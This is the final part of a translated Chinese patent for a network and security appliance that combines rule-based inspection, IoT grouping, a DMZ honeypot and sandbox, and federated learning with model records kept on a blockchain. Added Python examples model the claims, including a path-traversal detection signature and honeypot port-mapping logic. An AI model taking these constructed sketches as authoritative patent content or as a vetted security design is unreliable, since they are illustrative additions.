Further, the S2081: the security component periodically checks and upgrades the rule base and the machine learning model; the method specifically comprises the following steps:
for the rule base, checking is assisted by using a check code and a version number provided by an integrated machine manufacturer;
for machine learning models, the blockchain information stored on the all-in-one machine is used for checking and validation.
Further, the S2082: deploying the rule base and the machine learning model in an integrated machine; the method specifically comprises the following steps: when the rule base is confirmed correct, downloading the latest rule base and updating the local rule base;
downloading the machine learning model and deploying it locally at the same time;
during deployment, malicious traffic stored earlier is used to test the model:
if the detection fails, reporting the machine learning model and the test data;
if the detection succeeds, deploying the latest machine learning model while keeping backups of the most recent versions (machine learning models older than a certain point in time are removed to free up resources);
and if the newly deployed machine learning model degrades the user experience, restoring the old version of the machine learning model and reporting the corresponding model version to the manufacturer's federated learning network.
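As an added illustration of steps S2081 and S2082 (this is not the patent's own code; the SHA-256 check code, the number of retained backups, the callable-model interface and the sample records are assumptions), the following Python sketch verifies a rule-base download against the manufacturer's check code and version number, tests a candidate model on stored malicious samples before deploying it, keeps a bounded backup history and rolls back on demand:

```python
"""Added example (not the patent's code): rule-base verification, model
acceptance testing, bounded backups and rollback as in steps S2081/S2082.
Assumptions: the vendor's check code is a SHA-256 hex digest, a model is a
callable returning True for malicious samples, three backups are retained."""
import hashlib
from collections import deque

BACKUP_LIMIT = 3   # assumed: older backups are dropped to free resources


def check_code(blob: bytes) -> str:
    """Check code as assumed here: SHA-256 of the downloaded rule base."""
    return hashlib.sha256(blob).hexdigest()


def verify_rule_base(blob: bytes, vendor_code: str, version: int, local_version: int) -> bool:
    """Accept the download only if the check code matches and the version is newer."""
    return check_code(blob) == vendor_code and version > local_version


class ModelRegistry:
    """Holds the deployed model and a bounded history of previous versions."""

    def __init__(self, version: int, model):
        self.current = (version, model)
        self.backups = deque(maxlen=BACKUP_LIMIT)   # oldest entry drops off automatically
        self.reports = []   # records that would be sent to the vendor's federated network

    @staticmethod
    def detects_all(model, malicious_samples) -> bool:
        """Acceptance test: every stored malicious sample must be flagged."""
        return all(model(sample) for sample in malicious_samples)

    def deploy(self, version: int, candidate, malicious_samples) -> bool:
        """Test the candidate on stored malicious traffic; deploy only on success."""
        if not self.detects_all(candidate, malicious_samples):
            # Detection failed: report the model together with the test data.
            self.reports.append(("detection-failed", version, list(malicious_samples)))
            return False
        self.backups.append(self.current)
        self.current = (version, candidate)
        return True

    def rollback(self, reason: str) -> bool:
        """Restore the previous version and report the version being withdrawn."""
        if not self.backups:
            return False
        self.reports.append(("rolled-back", self.current[0], reason))
        self.current = self.backups.pop()
        return True


# Constructed sample data: flow feature records the sandbox labelled malicious.
MALICIOUS_SAMPLES = [
    {"bytes": 5000, "dst_port": 23},
    {"bytes": 2000, "dst_port": 2323},
]


def demo():
    """Walk through a failed deployment, a successful one and a rollback."""
    reg = ModelRegistry(1, lambda s: s["dst_port"] == 23)
    reg.deploy(2, lambda s: s["bytes"] > 4000, MALICIOUS_SAMPLES)   # misses sample 2
    reg.deploy(3, lambda s: s["bytes"] > 1000, MALICIOUS_SAMPLES)   # flags both
    reg.rollback("user experience degraded")
    return reg


if __name__ == "__main__":
    r = demo()
    print("current version:", r.current[0])
    print("reports:", [(rep[0], rep[1]) for rep in r.reports])
```

The acceptance test deliberately requires every stored malicious sample to be detected: a model that regresses on previously known traffic is reported rather than deployed, and the deque gives the "remove older backups" behaviour without extra bookkeeping.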
Federated learning is a machine learning technique that fuses the models of all participants into one large model and then redistributes it, while preserving privacy.
Federated learning typically requires the data involved in model fusion to be transmitted over a network; here the "vendor federated learning network" is a network built by the equipment vendor on a federated learning architecture.
The above description is only of the preferred embodiments of the present invention and is not intended to limit the present invention, but various modifications and variations can be made to the present invention by those skilled in the art. Any modification, equivalent replacement, improvement, etc. made within the spirit and principle of the present invention should be included in the protection scope of the present invention.

Claims (9)

1. The working method of the network communication and safety control integrated machine is characterized by comprising the following steps of:
the logic framework module of the all-in-one machine is in communication connection with the safety component, the user equipment component, the routing component, the Internet of things related component and the honeypot sandbox linkage component to coordinate the working modes of the components;
the local verification component of the all-in-one machine receives data flowing into and flowing out of the all-in-one machine and forwards the data to the safety component, the safety component analyzes and processes the data, and then the routing component forwards the data;
the internet of things gateway component of the all-in-one machine is in network communication with the user equipment component;
the honeypot sandbox linkage assembly is exposed to an external network on the routing assembly, and the honeypot listens on a communication interface and captures malicious code;
according to the analysis result of the safety component, interacting the malicious code with the honeypot sandbox linkage component;
in the process of interaction and sample capture by the honeypot sandbox linkage assembly, the honeypot sandbox linkage assembly transmits traffic analyzed by the sandbox to the internet of things gateway assembly for processing, and returns the gateway assembly's processed response to the attacker;
the honeypot sandbox linkage component analyzes the captured malicious codes, and trains the convolutional neural network by taking the software behaviors and the network behaviors as the labels of the malicious codes after extracting the software behaviors and the network behaviors;
The safety component is used for checking and accepting the trained convolutional neural network and checking and monitoring communication passing through the integrated machine through the trained convolutional neural network;
the honeypot sandbox linkage component analyzes the captured malicious codes, and trains the convolutional neural network by taking the software behaviors and the network behaviors as the labels of the malicious codes after extracting the software behaviors and the network behaviors; the method specifically comprises the following steps:
after the honeypot sandbox linkage component captures malicious code, it passes the code directly to the sandbox for analysis;
the sandbox starts an analysis process and analyzes the malicious code at the system level and the network level;
data desensitization is carried out on the data after the feature extraction operation is completed; at the same time the data set component in the honeypot sandbox linkage component performs a privacy inspection on the desensitized data, and data which cannot be desensitized can be used after an obfuscation operation;
training a machine learning model by using desensitization data;
the federated learning network server of the all-in-one machine manufacturer checks the trained machine learning models transmitted by all the all-in-one machines using known, definite malicious traffic, comprehensively compares the different machine learning models and sets corresponding weights;
the federated learning network server of the all-in-one machine manufacturer initiates a blockchain on-chain write and records the related model IDs, weights, parameters and submitters on the chain under notarization of most of the online all-in-one machines;
after the on-chain write is completed, the machine learning models are fused according to the block information using federated learning technology, and then access is opened.
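The server-side steps at the end of claim 1 (compare, weight, record on chain, fuse), as an added example that is not the patent's code. Everything concrete here is assumed: a "model" is a list of linear weights over flow features (malicious if the dot product is positive), a model's weight is its share of the total detection rate on known malicious flows, the chain is a plain hash-linked list with the multi-machine notarization left out, and fusion is weighted parameter averaging:

```python
"""Added example (not the patent's code): vendor-side federated learning server
step of claim 1 with toy models. Assumptions: linear toy models, weights
proportional to detection rate on known malicious traffic, a hash-linked list
standing in for the blockchain (notarization omitted), weighted averaging."""
import hashlib
import json

GENESIS = "0" * 64   # assumed previous-hash value for the first block


def detection_rate(params, malicious_flows) -> float:
    """Fraction of known malicious flows the toy linear model flags."""
    hits = sum(1 for x in malicious_flows
               if sum(p * f for p, f in zip(params, x)) > 0)
    return hits / len(malicious_flows)


def assign_weights(submissions, malicious_flows) -> dict:
    """Compare submitted models and weight each by its share of total detection rate."""
    rates = {sid: detection_rate(p, malicious_flows) for sid, p in submissions.items()}
    total = sum(rates.values())
    return {sid: r / total for sid, r in rates.items()} if total else {}


def append_block(chain, model_id, weight, params, submitter):
    """Record model ID, weight, parameters and submitter, linked to the previous block."""
    record = {"prev": chain[-1]["hash"] if chain else GENESIS,
              "model_id": model_id, "weight": weight,
              "params": params, "submitter": submitter}
    digest = hashlib.sha256(json.dumps(record, sort_keys=True).encode()).hexdigest()
    chain.append({"hash": digest, **record})
    return chain


def verify_chain(chain) -> bool:
    """Re-derive every hash and check the prev links before trusting block data."""
    prev = GENESIS
    for block in chain:
        record = {k: v for k, v in block.items() if k != "hash"}
        if record["prev"] != prev:
            return False
        if hashlib.sha256(json.dumps(record, sort_keys=True).encode()).hexdigest() != block["hash"]:
            return False
        prev = block["hash"]
    return True


def fuse_from_chain(chain) -> list:
    """Weighted average of the parameters recorded on a verified chain."""
    if not verify_chain(chain):
        raise ValueError("chain failed verification")
    dim = len(chain[0]["params"])
    return [sum(b["weight"] * b["params"][i] for b in chain) for i in range(dim)]


# Constructed data: two machines' models and four known-malicious feature vectors.
SUBMISSIONS = {"machine-A": [1.0, 0.0], "machine-B": [0.0, 1.0]}
MALICIOUS_FLOWS = [[1, 0], [1, 1], [0, 1], [1, 0]]


def run():
    """Weight the submissions, write them to the chain, then fuse from the chain."""
    weights = assign_weights(SUBMISSIONS, MALICIOUS_FLOWS)
    chain = []
    for i, (sid, params) in enumerate(SUBMISSIONS.items()):
        append_block(chain, f"model-{i}", weights[sid], params, sid)
    return weights, chain, fuse_from_chain(chain)


if __name__ == "__main__":
    w, c, fused = run()
    print("weights:", w)
    print("chain ok:", verify_chain(c))
    print("fused model:", fused)
```

Fusing from the chain rather than from the server's in-memory weights is the point of the on-chain step in the claim: a machine that later pulls the fused model can re-run the same verification over the blocks it sees.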
2. The method for operating a network communication and security management and control integrated machine according to claim 1, wherein a logic framework module of the integrated machine is in communication connection with a security component, a user equipment component, a routing component, an internet of things related component and a honeypot sandbox linkage component to coordinate the working modes of the components; the method specifically comprises the following steps:
the logic framework module of the all-in-one machine is in communication connection with the safety component, the user equipment component, the routing component, the Internet of things gateway component and the honeypot sandbox linkage component;
the security component interfaces with the routing component;
the security component interfaces with the Internet of things related component and the user equipment component;
the honeypot sandbox linkage assembly interfaces with the safety assembly and the Internet of things gateway assembly;
the Internet of things gateway component and the user equipment component interface with the routing component for network communication;
after the integrated machine acquires the rule information, the local verification component carries out integrity verification on the rule information; and the current machine learning model version and iteration state are checked using the model iteration blockchain information in the federated learning network.
3. The method of claim 1, wherein the local verification component of the all-in-one receives data flowing into and out of the all-in-one and forwards the data to the security component, the security component analyzes and processes the data, and the routing component forwards the data; the method specifically comprises the following steps:
checking whether the communication is in a security event cache table, if so, processing according to the operation in the security event cache table;
processing a data packet in the communication, respectively extracting the header information of the data link layer, network layer and transport layer and the application layer data, and comparing the header information with the rules stored in the rule base; the extracted data is matched against the contents of the rule base entry by entry, and if the extracted data matches what an entry describes, that is, the entry is hit, matching continues downwards;
performing application layer content inspection on data packets that pass the rule base inspection; ciphertext is ignored, and the rule base's application-layer plaintext rules are matched against the plaintext; wherein the application layer content comprises: the application layer protocol and the content transmitted by the application layer;
performing proportional dense sampling and logging of the communication process using NetFlow, checking the communication sampling data using the machine learning model in the security component, and checking the sampling log by log inspection;
when the security component encounters an abnormal condition or security event, a security event cache table in the security component is updated.
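The inspection order of claim 3 (cache table first, then layered header rules, then plaintext-only application content, with dense sampling and cache updates on the side), as an added example in Python; it is not the patent's code. The packet structure, the exact-match rule format, the substring application-layer rules, the 1-in-2 sampling ratio and all addresses are constructed:

```python
"""Added example (not the patent's code): the inspection sequence of claim 3 over
constructed packets. Assumptions: header fields arrive pre-parsed in a Packet,
header rules are exact-match field sets, application-layer rules are plaintext
substrings, dense sampling logs every SAMPLE_EVERY-th packet."""
from dataclasses import dataclass, field
from typing import Optional

SAMPLE_EVERY = 2   # assumed dense sampling ratio (1 in 2 packets logged)


@dataclass
class Packet:
    """Constructed stand-in for parsed link/network/transport headers and payload."""
    src_mac: str
    src_ip: str
    dst_ip: str
    proto: str
    dst_port: int
    app_proto: str
    plaintext: Optional[str]   # None when the application payload is ciphertext


@dataclass
class Rule:
    name: str
    match: dict   # header field -> required value; all must match for a hit


@dataclass
class Inspector:
    rules: list                     # header rule base
    app_rules: list                 # (substring, name) matched against plaintext only
    event_cache: dict = field(default_factory=dict)   # security event cache table
    flow_log: list = field(default_factory=list)      # sampled communication log
    seen: int = 0

    @staticmethod
    def flow_key(pkt: Packet):
        return (pkt.src_ip, pkt.dst_ip, pkt.proto, pkt.dst_port)

    def inspect(self, pkt: Packet):
        """Return (action, rule_name) for one packet, following the claim's order."""
        # Proportional dense sampling: every SAMPLE_EVERY-th packet is logged.
        self.seen += 1
        if self.seen % SAMPLE_EVERY == 0:
            self.flow_log.append((self.flow_key(pkt), pkt.app_proto))

        key = self.flow_key(pkt)
        # 1. Known security event: act as recorded and skip the remaining checks.
        if key in self.event_cache:
            return self.event_cache[key]

        # 2. Header fields against the rule base, entry by entry; first hit blocks.
        for rule in self.rules:
            if all(getattr(pkt, f) == v for f, v in rule.match.items()):
                return self._record(key, ("block", rule.name))

        # 3. Application-layer content check on plaintext only; ciphertext is skipped.
        if pkt.plaintext is not None:
            for needle, name in self.app_rules:
                if needle in pkt.plaintext:
                    return self._record(key, ("block", name))

        return ("allow", None)

    def _record(self, key, verdict):
        """Abnormal result: update the security event cache table."""
        self.event_cache[key] = verdict
        return verdict


# Constructed rule base and packets for a stand-alone run.
RULES = [Rule("inbound-telnet", {"proto": "tcp", "dst_port": 23})]
APP_RULES = [("../../", "http-path-traversal")]

PACKETS = [
    Packet("02:00:00:00:00:01", "203.0.113.7", "10.0.0.2", "tcp", 23, "telnet", "login:"),
    Packet("02:00:00:00:00:02", "203.0.113.8", "10.0.0.3", "tcp", 80, "http", "GET /../../ HTTP/1.1"),
    Packet("02:00:00:00:00:03", "203.0.113.9", "10.0.0.3", "tcp", 443, "tls", None),
    Packet("02:00:00:00:00:01", "203.0.113.7", "10.0.0.2", "tcp", 23, "telnet", "root"),  # cache hit
]


def run(packets=PACKETS):
    """Inspect the constructed packets and return the inspector with its verdicts."""
    insp = Inspector(RULES, APP_RULES)
    return insp, [insp.inspect(p) for p in packets]


if __name__ == "__main__":
    insp, verdicts = run()
    for p, v in zip(PACKETS, verdicts):
        print(p.src_ip, p.dst_port, v)
    print("cached events:", len(insp.event_cache), "sampled:", len(insp.flow_log))
```

The fourth packet shows the performance point the claim makes: its flow key is already in the cache table, so the recorded action is returned without touching the rule base or the payload.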
4. The method for operating a network communication and security management and control integrated machine according to claim 1, wherein an internet of things gateway component of the integrated machine performs network communication with a user equipment component; the method specifically comprises the following steps:
dividing the equipment in the gateway of the Internet of things into a plurality of equipment groups according to the equipment types and actions, and not checking the communication of the equipment in the equipment groups;
when the safety component checks the communication, firstly extracting the communication information and matching the safety event cache table, and if the communication information hits an item in the table, directly executing according to the operation recorded in the table, so that the follow-up check is skipped to improve the performance of the safety component;
when communication is carried out among different equipment groups in the gateway component of the Internet of things, the communication firstly passes through the gateway component of the Internet of things, the gateway component of the Internet of things only carries out sparse sampling record on the communication and carries out communication log inspection by using the security component, no additional security inspection is carried out, and communication limitation is carried out on equipment with abnormal log inspection and report is carried out;
The equipment in the user equipment group does not use grouping management, when the user equipment initiates access to the user equipment assembly, interaction among each equipment passes through the user equipment assembly, sparse sampling is conducted on communication by combining with the security assembly, communication log inspection is conducted, additional security inspection is not conducted, communication limitation is conducted on equipment with abnormal log inspection, and reporting is conducted;
the communication process between the Internet of things gateway component and the user equipment component is maintained by using an inter-component communication mapping table, all transverse communication among the components is recorded in the inter-component communication mapping table, meanwhile, the aging time is set to be the protocol communication time plus t minutes under the default condition, and entries exceeding the aging time are removed from the table;
under the default condition, the security level of the gateway component of the Internet of things is higher than that of the user equipment component, when the Internet of things equipment initiates interaction to the user equipment component, communication is only subjected to sparse sampling and checked by using a machine learning model, abnormal communication is blocked and reported, and corresponding equipment communication is limited; when the user equipment component initiates interaction to the Internet of things gateway component, densely sampling communication, checking by using a machine learning model, blocking abnormal communication, blocking related equipment and reporting;
When the security component encounters an abnormal condition or security event, a security event cache table in the security component is updated.
5. The method of claim 1, wherein the honeypot sandbox linkage assembly is exposed to an external network on the routing assembly, and the honeypot listens for a communication interface and captures malicious code; the method specifically comprises the following steps:
all communication of the honeypot sandbox linkage assembly passes through the routing assembly, and the routing assembly exposes the honeypot sandbox linkage assembly to the external network as a DMZ (demilitarized zone);
carrying out security policy configuration in the security assembly for the DMZ area where the honeypot sandbox linkage assembly is located;
the honeypot sandbox linkage component applies for and requires the routing component to open a monitoring interface in a low-priority mode, and captures malicious codes by using the monitoring interface;
the security policy configuration in the security assembly for the DMZ area where the honeypot sandbox linkage assembly is located specifically comprises the following steps:
configuring the DMZ zone so that it is not allowed to actively access any other component using a non-proprietary protocol, and the honeypot sandbox linkage component in the DMZ zone is not allowed to pass any information out to other components using a non-proprietary protocol; the proprietary protocol refers to an end-to-end tunneling protocol designed and implemented by the equipment manufacturer;
Configuring the user equipment component and the internet of things related component not to allow the DMZ zone to be actively accessed in any way and with any protocol;
the DMZ area is configured to actively initiate communication to the Internet of things gateway component by using a special protocol, and the communication is controlled by the honeypot sandbox linkage component and registered with the security component; the security component adds the device which is communicated with the DMZ zone into the DMZ communication group, reduces the security level of the device which is communicated with the DMZ zone to the minimum, and strictly limits the communication between the DMZ communication group and other components or devices;
the honeypot sandbox linkage component applies for and requires the routing component to open a monitoring interface in a low-priority mode, and captures malicious codes by using the monitoring interface; the method specifically comprises the following steps:
the routing component maps and exposes all transmission layer ports of the routing component with low priority, and registers and marks in the NAT forwarding table;
when the internal network initiates communication to the external network, the routing component checks whether the current communication appears in the NAT forwarding table, if so, forwarding is carried out according to the NAT forwarding table, otherwise, the low-priority port mapping entry of the corresponding port is cancelled and the current communication mapping is added;
when receiving the communication of the external network, the routing component firstly checks whether a corresponding entry exists in the NAT forwarding table, if so, forwarding is carried out according to the NAT forwarding table, otherwise, low-priority port mapping is matched, and the current communication is transmitted to the honeypot sandbox linkage component in the DMZ area for processing;
When the normal priority mapping passes the aging time of the NAT forwarding table and no subsequent communication is performed, deleting the normal priority mapping from the NAT forwarding table and automatically converting the normal priority mapping into a low priority port mapping; the low priority port mapping is not affected by the NAT forwarding table aging mechanism, and the existence time is positive infinity.
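The low-priority port mapping mechanism of claim 5, as an added Python model that is not the patent's code. The single table keyed by external-facing port, the 300 s aging time, the component name "dmz-honeypot" and the timeline are assumptions; the rules (all ports start as honeypot mappings, an internal session replaces the low-priority entry, unsolicited inbound traffic goes to the honeypot, idle normal entries revert, low-priority entries never age) follow the claim:

```python
"""Added example (not the patent's code): the routing component's NAT forwarding
table with low-priority honeypot mappings, as described in claim 5.
Assumptions: one table keyed by external-facing port, a 300 s aging time for
normal entries, and the honeypot sandbox component named "dmz-honeypot"."""
from dataclasses import dataclass
import math

HONEYPOT = "dmz-honeypot"   # assumed identifier of the honeypot sandbox linkage component
AGING_SECONDS = 300         # assumed NAT aging time for normal-priority mappings


@dataclass
class Mapping:
    dest: str              # where inbound traffic on this port is delivered
    low_priority: bool     # True: honeypot mapping; never ages out
    last_seen: float       # last packet time; +inf marks a low-priority entry


class NatTable:
    def __init__(self, ports):
        # All transport-layer ports start out mapped, at low priority, to the honeypot.
        self.table = {p: Mapping(HONEYPOT, True, math.inf) for p in ports}

    def outbound(self, internal_host: str, port: int, now: float) -> str:
        """Internal host starts a session through `port`."""
        m = self.table.get(port)
        if m is not None and not m.low_priority:
            m.last_seen = now          # live session: forward and refresh its timer
            return m.dest
        # No live session: cancel the low-priority mapping and register this one.
        self.table[port] = Mapping(internal_host, False, now)
        return internal_host

    def inbound(self, port: int, now: float):
        """External packet arrives on `port`; returns its destination component."""
        m = self.table.get(port)
        if m is None:
            return None                # port not exposed at all
        if not m.low_priority:
            m.last_seen = now
            return m.dest              # matches a live session
        return HONEYPOT                # unsolicited: hand to the honeypot in the DMZ

    def age(self, now: float) -> int:
        """Expire idle normal mappings back to low-priority honeypot mappings."""
        expired = 0
        for port, m in list(self.table.items()):
            if not m.low_priority and now - m.last_seen > AGING_SECONDS:
                self.table[port] = Mapping(HONEYPOT, True, math.inf)
                expired += 1
        return expired


def scenario():
    """Constructed timeline: an unsolicited probe, a user session, then expiry."""
    nat = NatTable(range(1, 1025))
    events = []
    events.append(("probe", nat.inbound(443, 0)))            # goes to the honeypot
    events.append(("open", nat.outbound("10.0.0.5", 443, 10)))
    events.append(("reply", nat.inbound(443, 20)))           # goes to 10.0.0.5
    events.append(("expired", nat.age(20 + AGING_SECONDS + 1)))
    events.append(("probe-again", nat.inbound(443, 400)))    # honeypot again
    return events


if __name__ == "__main__":
    for name, result in scenario():
        print(f"{name:12} {result}")
```

The defensive property worth checking in such a table is the one the last step exercises: once the real session ages out, the port must fall back to the honeypot rather than to the previously mapped internal host, otherwise an attacker who observed the session could keep reaching that host.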
6. The method for operating a network communication and security management and control integrated machine according to claim 1, wherein malicious codes are interacted with a honeypot sandbox linkage assembly according to an analysis result of a security assembly; the method specifically comprises the following steps:
for the checked traffic, maintaining a session mapping table and forwarding continuously by the routing component;
for the traffic which does not pass the inspection and is explicitly marked as malicious, immediately taking measures and inducing communication to the honeypot sandbox linkage assembly;
for traffic which does not pass the inspection but cannot be clearly identified as malicious, blocking it and recording it in the security event cache table, while inducing the communication to the honeypot sandbox linkage assembly so as to attract and pin down the attack; if subsequent detection clears the earlier analysis result, marking the traffic in the security event cache table and removing the communication restriction, then closely monitoring and tracking the marked traffic for a period of time and blocking it promptly once high-risk network communication or communication with sensitive equipment and resources is discovered;
For traffic that does not pass the inspection and is explicitly marked as malicious, immediately taking measures and inducing the communication to the honeypot sandbox linkage assembly; the method specifically comprises the following steps:
when malicious communication is found in communication of an incoming network, the security component informs the honeypot sandbox linkage component of preparing to take over the malicious communication and monitoring the malicious communication, simultaneously immediately blocks communication with internal equipment, and adds an entry in a security event cache table in the security component for recording the inspection result;
if the malicious code is captured, the malicious code sample is sent to a sandbox for analysis, and meanwhile, a threat is reported to a user; if the malicious codes are not captured, recording an interaction process, desensitizing the data related to privacy and reporting current interaction information to a manufacturer server, and simultaneously notifying a user of the threat discovery;
when, in outgoing network communication, internal equipment is found to send abnormal traffic to the outside, a notice or an alarm is sent to the user; if high-risk behaviour or network communication is found, the communication is blocked and the related equipment is placed in communication isolation, so that malicious threats on the isolated equipment cannot easily spread to other equipment, and the user is alerted;
If the number of the infected devices exceeds the set threshold or the number of abnormal traffic sent to the outside by the internal devices exceeds the set threshold, the security component disconnects itself from the external network to perform self-isolation, reducing the risk of threat continuing to spread to the outside, and simultaneously enables a standby communication interface, which allows the user to remotely access or access in emergency to the integrated machine and operate the integrated machine, to send logs and captured malicious communication to the user and the equipment manufacturer server.
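The decision logic of claim 6, as an added Python example that is not the patent's code: the three-way disposition of inspected inbound traffic, the later clearing of a "suspicious" entry, per-device isolation for outbound anomalies and the threshold-triggered self-isolation with a standby interface. The verdict labels, the threshold values, the queue standing in for the honeypot hand-off and the device names are constructed:

```python
"""Added example (not the patent's code): disposition rules of claim 6 and the
threshold-based self-isolation step. Assumptions: verdicts arrive from the
security component as 'pass', 'malicious' or 'suspicious'; thresholds are
constructed values; the honeypot hand-off is modelled as a queue."""
from dataclasses import dataclass, field

INFECTED_DEVICE_THRESHOLD = 2     # assumed: more than this many isolated devices
OUTBOUND_ANOMALY_THRESHOLD = 5    # assumed: more than this many abnormal outbound flows


@dataclass
class SecurityComponent:
    session_table: dict = field(default_factory=dict)   # flows the router keeps forwarding
    event_cache: dict = field(default_factory=dict)     # security event cache table
    honeypot_queue: list = field(default_factory=list)  # flows induced to the honeypot sandbox
    isolated_devices: set = field(default_factory=set)
    outbound_anomalies: int = 0
    self_isolated: bool = False
    standby_interface_up: bool = False

    def dispose_inbound(self, flow, verdict: str) -> str:
        """Three-way handling of inspected inbound traffic."""
        if verdict == "pass":
            self.session_table[flow] = "forward"
            return "forward"
        # Both remaining cases are induced to the honeypot sandbox linkage component.
        self.honeypot_queue.append(flow)
        if verdict == "malicious":
            self.event_cache[flow] = "block"        # explicit malicious: block immediately
            return "block"
        self.event_cache[flow] = "block-pending"    # suspicious: blocked until analysis clears it
        return "block-pending"

    def clear_after_analysis(self, flow) -> bool:
        """Analysis ruled out the threat: lift the restriction but keep the flow marked."""
        if self.event_cache.get(flow) != "block-pending":
            return False
        self.event_cache[flow] = "watch"
        return True

    def outbound_anomaly(self, device: str, high_risk: bool) -> bool:
        """Abnormal outbound traffic from an internal device; True once self-isolated."""
        self.outbound_anomalies += 1
        if high_risk:
            self.isolated_devices.add(device)   # communication isolation for that device
        if (len(self.isolated_devices) > INFECTED_DEVICE_THRESHOLD
                or self.outbound_anomalies > OUTBOUND_ANOMALY_THRESHOLD):
            # Spread too wide: leave the external network, open the standby interface.
            self.self_isolated = True
            self.standby_interface_up = True
        return self.self_isolated


def scenario():
    """Constructed sequence of inbound verdicts and outbound anomalies."""
    sc = SecurityComponent()
    sc.dispose_inbound(("198.51.100.4", "10.0.0.2", 22), "pass")
    sc.dispose_inbound(("198.51.100.5", "10.0.0.2", 23), "malicious")
    sc.dispose_inbound(("198.51.100.6", "10.0.0.3", 80), "suspicious")
    sc.clear_after_analysis(("198.51.100.6", "10.0.0.3", 80))
    for dev in ("cam-1", "cam-2", "cam-3"):
        sc.outbound_anomaly(dev, high_risk=True)
    return sc


if __name__ == "__main__":
    s = scenario()
    print("event cache:", s.event_cache)
    print("self-isolated:", s.self_isolated, "standby interface:", s.standby_interface_up)
```

Note that a cleared suspicious flow moves to a "watch" state rather than being deleted from the cache table, matching the claim's requirement that marked traffic stays under close monitoring for a period after the restriction is lifted.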
7. The working method of the network communication and safety control integrated machine according to claim 1, wherein in the process of interaction and sample capturing of the honeypot sandbox linkage assembly, the honeypot sandbox linkage assembly transmits traffic after analysis of a sandbox to the internet of things gateway assembly for processing, and returns the processed returned information of the internet of things gateway assembly to an attacker; the method specifically comprises the following steps:
the honeypot sandbox linkage component receives suspicious or malicious communication actively hitting the DMZ zone and induced by the security component;
the honeypot creates a corresponding instance and registers it in the honeypot sandbox linkage component; when the communication involves the external network it updates the NAT forwarding table and the session mapping table, and when it involves the internal network it updates and maintains the inter-component communication mapping table and the session mapping table;
for communication capable of interacting with the honeypot sandbox linkage assembly, the honeypot sandbox linkage assembly uses the set communication protocol according to the situation, so that a sandbox in the honeypot sandbox linkage assembly directly accesses real Internet of things equipment in the Internet of things gateway assembly;
under the supervision of the safety component, the set communication protocol is used to send part of the commands executed in the honeypot, after processing, to the sandbox for pre-analysis so as to eliminate potential safety hazards;
commands that have passed the sandbox-assisted test are sent to the real Internet of things equipment, whose response is awaited and taken as the honeypot's response; the honeypot sandbox linkage assembly selects several of the Internet of things devices to assist its operation according to the communication protocol, interaction and performance conditions;
and the honeypot sandbox linkage component performs data desensitization, data obfuscation and replacement operations on the information returned by the real Internet of things equipment, and finally returns the result to the communication peer.
8. The method of claim 1, wherein the security component checks and accepts the trained convolutional neural network and checks and monitors communications through the integrated machine via the trained convolutional neural network; the method specifically comprises the following steps:
The security component periodically checks and upgrades the rule base and the machine learning model;
deploying the rule base and the machine learning model in an integrated machine;
the deployed rule base and machine learning model operate normally in the integrated machine to identify abnormal communication.
9. Network communication and security management integrated machine employing the working method according to any one of claims 1 to 8, characterized by comprising: a local verification component;
the local verification component is connected with the safety component;
the safety component is connected with the logic framework module;
the logic frame module is respectively connected with the user equipment component, the routing component, the Internet of things gateway component and the honeypot sandbox linkage component;
the safety component is respectively connected with the user equipment component, the routing component, the Internet of things gateway component and the honeypot sandbox linkage component;
the honeypot sandbox linkage assembly is connected with the honeypot, the sandbox and the data set assembly;
the user equipment component is in network communication with the routing component;
the routing component is in network communication with the Internet of things related component;
the Internet of things gateway component is connected with the honeypot sandbox linkage component.
CN202210499337.6A 2022-05-09 2022-05-09 Network communication and safety control integrated machine and working method thereof Active CN115189905B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202210499337.6A CN115189905B (en) 2022-05-09 2022-05-09 Network communication and safety control integrated machine and working method thereof


Publications (2)

Publication Number Publication Date
CN115189905A CN115189905A (en) 2022-10-14
CN115189905B true CN115189905B (en) 2023-05-23

Family

ID=83513085


Country Status (1)

Country Link
CN (1) CN115189905B (en)

Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN102088379A (en) * 2011-01-24 2011-06-08 国家计算机网络与信息安全管理中心 Detecting method and device of client honeypot webpage malicious code based on sandboxing technology
CN108460277A (en) * 2018-02-10 2018-08-28 北京工业大学 A kind of automation malicious code mutation detection method
CN111651757A (en) * 2020-06-05 2020-09-11 深圳前海微众银行股份有限公司 Attack behavior monitoring method, device, equipment and storage medium
CN113794675A (en) * 2021-07-14 2021-12-14 中国人民解放军战略支援部队信息工程大学 Distributed Internet of things intrusion detection method and system based on block chain and federal learning

Family Cites Families (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US11620481B2 (en) * 2020-02-26 2023-04-04 International Business Machines Corporation Dynamic machine learning model selection




Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant